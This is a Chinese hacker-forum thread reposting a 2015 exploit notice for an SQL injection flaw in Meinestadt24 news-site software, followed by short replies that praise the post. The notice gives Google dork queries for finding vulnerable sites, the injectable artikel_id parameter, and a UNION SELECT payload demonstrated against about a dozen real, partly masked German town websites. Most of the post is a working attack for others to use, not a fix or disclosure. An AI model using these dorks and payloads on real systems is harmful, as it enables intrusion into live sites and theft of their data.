查看: 74800|回复: 106

Meinestadt24注入漏洞

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-7-27 11:43:42 | 显示全部楼层 |阅读模式
    [PHP] 纯文本查看 复制代码
    [-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
     
    Exploit Title : Meinestadt24 SQL Injection Vulnerability
     
    Exploit Author : Ashiyane Digital Security Team
     
    Google Dork One : intext:© 2015 meinestadt24
    Google Dork Two : inurl:nachrichten.php?artikel_id=
     
    Date : 2015-7-25
     
    Tested On : Windows Se7en
     
    [-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
     
    Path Of Vulnerability :
     
    [url]http://Target.de/nachrichten.php?artikel_id=-AnyNumber[/url] [SQLI]
     
    * Reminder : Your Sqli Command Needs UrlEncode
     
    [-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
    Demos :
     
    [url]http://www.meiXgriesheim.de/nachrichten.php?artikel_id=-983722[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
     
    [url]http://www.meiXeckarsulm.de/nachrichten.php?artikel_id=-990952[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
     
    [url]http://www.meinXnsberg.de/nachrichten.php?artikel_id=-293312[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
     
    [url]http://www.meXberbach.de/nachrichten.php?artikel_id=-991321[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
     
    [url]http://www.meXschaffenburg.de/nachrichten.php?artikel_id=-74847[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
     
    [url]http://www.meXarmstadt.de/nachrichten.php?artikel_id=-996681[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
     
    [url]http://www.meXabenhausen.de/nachrichten.php?artikel_id=-992823[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
     
    [url]http://www.meXkarlsruhe.de/nachrichten.php?artikel_id=-88747[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
     
    [url]http://www.mein-Xchenzell.de/nachrichten.php?artikel_id=-46129[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
     
    [url]http://www.mXbebra.de/nachrichten.php?artikel_id=-981361[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
     
    [url]http://www.mein-Xrsch.de/nachrichten.php?artikel_id=-987491[/url] UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
     
    And many more ...
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-7-27 13:19:12 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-28 04:52:04 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-30 02:33:30 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-30 07:59:31 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-7-31 10:20:02 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-31 16:21:31 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-31 17:13:01 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-1 01:59:45 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-1 04:38:03 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 14:26 , Processed in 0.029548 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部